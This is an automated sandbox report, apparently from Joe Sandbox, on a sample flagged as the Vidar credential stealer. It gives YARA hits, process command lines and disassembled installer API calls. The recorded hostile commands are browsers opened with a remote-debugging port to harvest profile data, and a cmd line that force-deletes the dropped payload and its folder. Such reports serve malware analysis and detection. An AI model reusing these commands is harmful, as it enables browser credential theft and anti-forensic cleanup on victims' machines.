                                                                                                                                                                                                                                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355126342.0000000001BE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354948680.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354981968.0000000004C0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2354920999.0000000004509000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3031023113.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3030645181.0000000001C6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3028437270.00000000003D1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355154530.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2355096916.0000000001C94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                                      Start time:11:14:01
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                      Imagebase:0x770000
                                                                                                                                                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                      Start time:11:14:40
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                                      Start time:11:14:41
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,9483855011008134585,3632144003053426118,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                                      Start time:11:14:55
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                      Start time:11:14:56
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=2552,i,9281795013285619816,5937589130455718843,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                                      Start time:11:14:56
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                                      Start time:11:14:56
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                                                                      Start time:11:14:59
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6536 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                                      Start time:11:14:59
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                                      Start time:11:15:02
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                      Start time:11:15:02
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit
                                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                      Start time:11:15:56
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                        Signature Coverage:21%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:28
                                                                                                                                                                                                                                                                                                        execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 